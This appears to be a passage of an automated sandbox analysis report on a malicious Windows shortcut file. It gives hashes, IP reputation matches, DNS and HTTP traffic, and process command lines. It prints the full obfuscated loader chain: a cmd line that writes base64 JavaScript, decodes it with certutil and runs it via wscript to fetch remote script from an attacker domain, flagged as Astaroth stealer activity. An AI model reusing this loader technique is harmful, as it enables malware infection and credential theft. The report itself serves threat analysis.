                                                                eJHvz7JQmR.lnkGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                8XJE1azNII.cmdGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                bwlUlnek8c.lnkGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                https://eferreira.clickfunnels.com/webinar-registrationdxyd7k9qGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                https://mail.turing.com/api/analytics?ti=d554d536f06a156d824003d0c664b257c1ebe0746f5c636f01cb954c5f0c4b684821ae3ba8e679c9e7728c86aa69b0b0eed472c96393f62a0c431339782e0ac4d40f4a8cad32476fff07a90a24abc253eae29ade09a4a164d68248967df03bc0b5257f664b57a390cc3682f8eca1aefd040988f60d0b6f829267aae6229c4d&rd=http://www.Xcelenergy325.pageworks.com.au/cindy.a.hoffman/Y2luZHkuYS5ob2ZmbWFuQHhjZWxlbmVyZ3kuY29tGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                cL8CyFuzWP.lnkGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                https://www.sipps.it/?download=1&kccpid=5733068&kcccount=///h7u77d.codesandbox.io?e=Y291cnRuZXkud2FyZGVuQGJhcm5ldC5nb3YudWs=Get hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                http://9anime.toGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                jGsBbpdEav.cmdGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                CLOUDFLARENETUSgzLeH3Dmtn.lnkGet hashmaliciousBrowse
                                                                • 104.16.123.96
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.96.3
                                                                39kRpZ5JDT.exeGet hashmaliciousBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.96.3
                                                                http://www.avenueis.com.auGet hashmaliciousBrowse
                                                                • 172.67.38.66
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.97.9
                                                                y2OSL6rKkW.exeGet hashmaliciousBrowse
                                                                • 188.114.97.3
                                                                tmpCB8E.htmGet hashmaliciousBrowse
                                                                • 104.17.25.14
                                                                5hP9peipcx.elfGet hashmaliciousBrowse
                                                                • 1.3.127.11
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.96.3
                                                                Play_Now #U23ee#Ufe0f #U25b6#Ufe0f #U23ed#Ufe0f_20222322.htm_Get hashmaliciousBrowse
                                                                • 104.17.25.14
                                                                Ionos.htmGet hashmaliciousBrowse
                                                                • 104.17.25.14
                                                                65KUG4ai.exeGet hashmaliciousBrowse
                                                                • 104.20.67.143
                                                                file.exeGet hashmaliciousBrowse
                                                                • 188.114.97.9
                                                                https://elixirofficial.com/Get hashmaliciousBrowse
                                                                • 104.17.25.14
                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                37f463bf4616ecd445d4a1937da06e19lol.vbsGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                gzLeH3Dmtn.lnkGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                https://thepgjplms-my.sharepoint.com/:f:/g/personal/cory_thepg_com_au/EpXiNYRo9QRKpjCh4yJpBMUBU1VJ3ZI2OF1VS_V6ap3fgQ?e=wbw0abGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                tmpCB8E.htmGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                http://www.y.psc4fuel.comGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                https://rackspace-106139.weeblysite.com/Get hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                Play_Now #U23ee#Ufe0f #U25b6#Ufe0f #U23ed#Ufe0f_20222322.htm_Get hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                Ionos.htmGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                olgoonik_Employee-Benefits_Handbook.htmGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                http://filereport387.4nmn.comGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                Policy Docs.htmlGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                http://go.skimresources.com/?id=129857X1600501&url=http://cna.jolam.com.br/aG9sbHkuY2FydGVyQGNuYS5jb20Get hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                https://www.google.com/url?q=https://script.google.com/macros/s/AKfycbxj81MOVwwquAIa9XzInGKjv9vN-Fvq8CyR1QPOgSexT7SylfX19oV4zCiTAkZBFTE/exec?r16or4p22&sa=D&source=editors&ust=1675197778836812&usg=AOvVaw3LA2q4v5qOqvPQ_WkxbwsLGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                Secure_Messages.PDF.htmlGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                tmp444.htmGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                Completed Signed Agreements.htmlGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                DFE5049756F130F2559746DA26D1A7DCE785B0099A715.exeGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                Voicemail - 6737878.htmGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                VoiceNote.htmGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                http://go.staticvisit.netGet hashmaliciousBrowse
                                                                • 104.16.124.96
                                                                No context
                                                                Process:C:\Windows\System32\cmd.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):115
                                                                Entropy (8bit):4.8753913563792635
                                                                Encrypted:false
                                                                SSDEEP:3:qSRoOhUXGde8ux1iHeYYGRtXOKOROHbzGmWuPe:qYvCWde8uzke5mXaROHPe
                                                                MD5:CD1237439B02D4630BDF97FD569C08C7
                                                                SHA1:A649E31837844B577EBFDFFE47E568013892E14D
                                                                SHA-256:0ACED34175579F357EF6571DF3947AB9C88B4539C650469FB557D6CFA8875F94
                                                                SHA-512:7258BA02054D2CD53BAD51CA2B378DBB464C497906BB1EC87E08088648A3F2A4D51DDA2399D1E2A04587B189798A500CA0B94637EA434B698A4DE47481373A4A
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:var C18p="sc"+"r";D18p="ip"+"t:h";E18p="T"+"tP"+":";GetObject(C18p+D18p+E18p+"//gwae8.industryinfluence.shop/?3/");
                                                                File type:MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                                                Entropy (8bit):5.501500197410826
                                                                TrID:
                                                                • Windows Shortcut (20020/1) 100.00%
                                                                File name:uk231b27we.lnk
                                                                File size:493
                                                                MD5:992f5faaef370f7963b09123eaee18dd
                                                                SHA1:cf99a5906e22105ade1f367f0c289fafa9952a1c
                                                                SHA256:d7ddebfa36f629e5ef41b692140e2c06f23b5c8017040215eaf0247a7db3b2f7
                                                                SHA512:8ef44a9c4b252683149c1e3fb72b92e856f5caf1f52a49019b98fd7256718c5c83855b6911cdde83c740c015c7fdc52e06a538ba7bf56827edacbff2b0348246
                                                                SSDEEP:12:8rflM8OBE6ZG8WgkQqWmSbjdnLehOmxm77Rdq/GjJpVNIgm3:8loG8WFtWmQtLehOem7HndNIj3
                                                                TLSH:EBF02B88A8213EC0C0188C3FCA3B3B880D0C28070F45701207C9028840A0C88BA3AF70
                                                                File Content Preview:L..................F1... ...................................................]....P.O. .:i.....+00.../C:\......................+.2...........wINdOws\sYSteM32\conHost.EXe.....C:\wINdOws\sYSteM32+.%ComSpec% /V/D/c "md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdH
                                                                Icon Hash:00828e868e89bd0d

                                                                General

                                                                Relative Path:
                                                                Command Line Argument:%ComSpec% /V/D/c "md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!"
                                                                Icon location:
                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                192.168.2.3172.67.221.2249681802851288 02/01/23-07:46:04.571673TCP2851288ETPRO TROJAN Astaroth Stealer Activity (GET)4968180192.168.2.3172.67.221.22
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Feb 1, 2023 07:46:04.553697109 CET4968180192.168.2.3172.67.221.22
                                                                Feb 1, 2023 07:46:04.570945024 CET8049681172.67.221.22192.168.2.3
                                                                Feb 1, 2023 07:46:04.571114063 CET4968180192.168.2.3172.67.221.22
                                                                Feb 1, 2023 07:46:04.571672916 CET4968180192.168.2.3172.67.221.22
                                                                Feb 1, 2023 07:46:04.588733912 CET8049681172.67.221.22192.168.2.3
                                                                Feb 1, 2023 07:46:04.681535959 CET8049681172.67.221.22192.168.2.3
                                                                Feb 1, 2023 07:46:04.681664944 CET4968180192.168.2.3172.67.221.22
                                                                Feb 1, 2023 07:46:04.733427048 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:04.733500957 CET44349682104.16.124.96192.168.2.3
                                                                Feb 1, 2023 07:46:04.733609915 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:04.752247095 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:04.752300024 CET44349682104.16.124.96192.168.2.3
                                                                Feb 1, 2023 07:46:04.802468061 CET44349682104.16.124.96192.168.2.3
                                                                Feb 1, 2023 07:46:04.802714109 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:05.172800064 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:05.172831059 CET44349682104.16.124.96192.168.2.3
                                                                Feb 1, 2023 07:46:05.173230886 CET44349682104.16.124.96192.168.2.3
                                                                Feb 1, 2023 07:46:05.173301935 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:05.175806999 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:05.175823927 CET44349682104.16.124.96192.168.2.3
                                                                Feb 1, 2023 07:46:05.218571901 CET44349682104.16.124.96192.168.2.3
                                                                Feb 1, 2023 07:46:05.218666077 CET44349682104.16.124.96192.168.2.3
                                                                Feb 1, 2023 07:46:05.218744993 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:05.218787909 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:05.251394033 CET49682443192.168.2.3104.16.124.96
                                                                Feb 1, 2023 07:46:05.251434088 CET44349682104.16.124.96192.168.2.3
                                                                Feb 1, 2023 07:46:08.603228092 CET4968180192.168.2.3172.67.221.22
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Feb 1, 2023 07:46:04.494297028 CET5426453192.168.2.38.8.8.8
                                                                Feb 1, 2023 07:46:04.542516947 CET53542648.8.8.8192.168.2.3
                                                                Feb 1, 2023 07:46:04.697105885 CET5897453192.168.2.38.8.8.8
                                                                Feb 1, 2023 07:46:04.719468117 CET53589748.8.8.8192.168.2.3
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Feb 1, 2023 07:46:04.494297028 CET192.168.2.38.8.8.80x9214Standard query (0)gwae8.industryinfluence.shopA (IP address)IN (0x0001)false
                                                                Feb 1, 2023 07:46:04.697105885 CET192.168.2.38.8.8.80x2d4dStandard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Feb 1, 2023 07:46:04.542516947 CET8.8.8.8192.168.2.30x9214No error (0)gwae8.industryinfluence.shop172.67.221.22A (IP address)IN (0x0001)false
                                                                Feb 1, 2023 07:46:04.542516947 CET8.8.8.8192.168.2.30x9214No error (0)gwae8.industryinfluence.shop104.21.70.70A (IP address)IN (0x0001)false
                                                                Feb 1, 2023 07:46:04.719468117 CET8.8.8.8192.168.2.30x2d4dNo error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                                                                Feb 1, 2023 07:46:04.719468117 CET8.8.8.8192.168.2.30x2d4dNo error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                                                                • www.cloudflare.com
                                                                • gwae8.industryinfluence.shop
                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.349682104.16.124.96443C:\Windows\System32\wscript.exe
                                                                TimestampkBytes transferredDirectionData


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.349681172.67.221.2280C:\Windows\System32\wscript.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Feb 1, 2023 07:46:04.571672916 CET0OUTGET /?3/ HTTP/1.1
                                                                Accept: */*
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: gwae8.industryinfluence.shop
                                                                Connection: Keep-Alive
                                                                Feb 1, 2023 07:46:04.681535959 CET1INHTTP/1.1 302 Found
                                                                Date: Wed, 01 Feb 2023 06:46:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: PHPSESSID=2vevkkiqbfgqvuks99kiu1ri8o; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                Access-Control-Allow-Origin: *
                                                                Location: https://www.cloudflare.com/cdn-cgi/error
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KLnWo7TOHNvG%2BkJ0JfexUhTzBDi%2FGmtR3QO3uMYDMWlrTYX27U7BfA1UcoE3QswxPHLu4qmZSEO1r9PHtr4tvPKw52c6TkCEpUPZIQGQ15R4OaIJbHbcFTlQBgnwUgckQtrVaDFKw2soQzZ21cCI"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 7928ba569a079048-FRA
                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.349682104.16.124.96443C:\Windows\System32\wscript.exe
                                                                TimestampkBytes transferredDirectionData
                                                                2023-02-01 06:46:05 UTC0OUTGET /cdn-cgi/error HTTP/1.1
                                                                Accept: */*
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Connection: Keep-Alive
                                                                Host: www.cloudflare.com
                                                                2023-02-01 06:46:05 UTC0INHTTP/1.1 404 Not Found
                                                                Date: Wed, 01 Feb 2023 06:46:05 GMT
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: MISS
                                                                Set-Cookie: __cf_bm=HuxegvGqhPYj.RmC4Z5BvFwAUbphzy6uoWYlMjbn75I-1675233965-0-Aaaf9mQqj3uibNCAaCSZwu7+dUgj+Q0HUsqcC05pF3vk4twZOxrm6f79uC6VSOXzSChkWjNH93sJcyJueQo47SqbhV2WUSbMN6AYB2WG5yRf; path=/; expires=Wed, 01-Feb-23 07:16:05 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=None
                                                                Server-Timing: cf-q-config;dur=6.0000002122251e-06
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nm6%2B2%2FiRNIaRnavKlgeBIJCR2OhRC7bTShI3kSlts9Bq%2F4TeHdgYWVJBiLxcPeIM1sfMbk%2FjhgDxcvV7GOQwTIwA95teLMMeDeK67IhNAo8%2BVCpBOBcm8gzNRgpFUH5GK2A%2FVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnKVGuWQtbjLxL; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:46:05 GMT; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 7928ba5a6cd990ee-FRA
                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                2023-02-01 06:46:05 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:1
                                                                Start time:07:46:02
                                                                Start date:01/02/2023
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!
                                                                Imagebase:0x7ff707bb0000
                                                                File size:273920 bytes
                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Target ID:2
                                                                Start time:07:46:02
                                                                Start date:01/02/2023
                                                                Path:C:\Windows\System32\certutil.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS
                                                                Imagebase:0x7ff72d670000
                                                                File size:1557504 bytes
                                                                MD5 hash:EB199893441CED4BBBCB547FE411CF2D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Target ID:3
                                                                Start time:07:46:03
                                                                Start date:01/02/2023
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS"
                                                                Imagebase:0x7ff73faf0000
                                                                File size:163840 bytes
                                                                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                No disassembly